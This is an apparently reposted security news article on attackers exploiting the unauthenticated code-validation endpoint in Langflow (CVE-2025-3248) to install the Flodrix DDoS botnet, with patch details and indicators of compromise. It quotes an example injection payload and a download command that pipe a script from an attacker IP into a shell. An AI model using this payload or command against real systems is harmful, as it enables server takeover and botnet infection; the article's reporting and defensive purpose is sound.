Hackers Exploit Langflow RCE Vulnerability to Deploy Flodrix Botnet

A critical remote code execution (RCE) vulnerability in Langflow (CVE-2025-3248) is being actively exploited to deploy the Flodrix botnet, enabling full system compromise and distributed denial-of-service (DDoS) attacks.

The flaw, rated 9.8 on the CVSS scale, affects Langflow versions <1.3.0 and allows unauthenticated attackers to execute arbitrary code via malicious API requests.

Trend Micro reports over 500 exposed instances globally, with threat actors leveraging Shodan/FOFA scans and open-source exploit code to infiltrate AI development environments.

Code Injection via AST Compilation

The vulnerability resides in Langflow’s /api/v1/validate/code endpoint, which processes user-submitted Python code without authentication.

Attackers embed malicious payloads in function decorators or default arguments, exploiting Python’s ast.parse() and compile() functions to execute code during AST validation.

Example exploit payload:

python@exec("import os; os.system('curl http://80.66.75.121/docker | sh')")
def malicious_function():
    pass

This code triggers a downloader script that fetches Flodrix binaries.

Langflow’s lack of input sanitization or sandboxing allows such payloads to execute with server privileges, enabling reconnaissance commands like whoami, printenv, and network interface enumeration.

From Initial Access to Botnet Deployment

Exploitation follows a structured pattern:

1. Reconnaissance: Threat actors scan for exposed Langflow instances using tools like Shodan.
2. Exploitation: A GitHub-hosted PoC (https://github.com/verylazytech/CVE-2025-3248) sends crafted POST requests to execute shell commands.
3. Payload Delivery: A bash script (docker) downloads architecture-specific Flodrix binaries:

bashcurl -s http://80.66.75.121:25565/docker | sh

4. Persistence: Flodrix uses XOR-based decryption (key: qE6MGAbI) to hide C&C IPs, establishes TCP/UDP channels, and terminates competing processes like busybox or watchdog.

The botnet supports six DDoS attack modes, including tcpraw udpplain, while evading detection through self-deletion and artifact removal.

Mitigation Strategies and Patch Analysis

Langflow 1.3.0 resolves CVE-2025-3248 by implementing JWT/API key authentication via the CurrentActiveUser dependency. The patch:

• Validates credentials before processing API requests
• Checks user activity status via is_active flag
• Blocks unauthenticated access to /api/v1/validate/code

Recommended actions:

• Upgrade Langflow to ≥1.3.0 immediately
• Restrict public access to Langflow endpoints
• Monitor for IOCs like C&C IPs 80.66.75.121 and 45.61.137.226

Risk Factor	Details
CVE Identifier	CVE-2025-3248
CVSS Score	9.8 (Critical)
Affected Versions	Langflow <1.3.0
Impact	RCE, DDoS attacks, sensitive data exfiltration
Remediation	Patch to v1.3.0; implement network segmentation

Security teams should deploy intrusion prevention filters (e.g., Trend Micro’s #45744) and hunt for Flodrix’s UDP notification patterns (KILLDETAIL|PID|PPID|...).

With AI infrastructure becoming a prime target, proactive vulnerability management is critical to prevent large-scale compromises.

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates

The post Hackers Exploit Langflow RCE Vulnerability to Deploy Flodrix Botnet appeared first on Cyber Security News.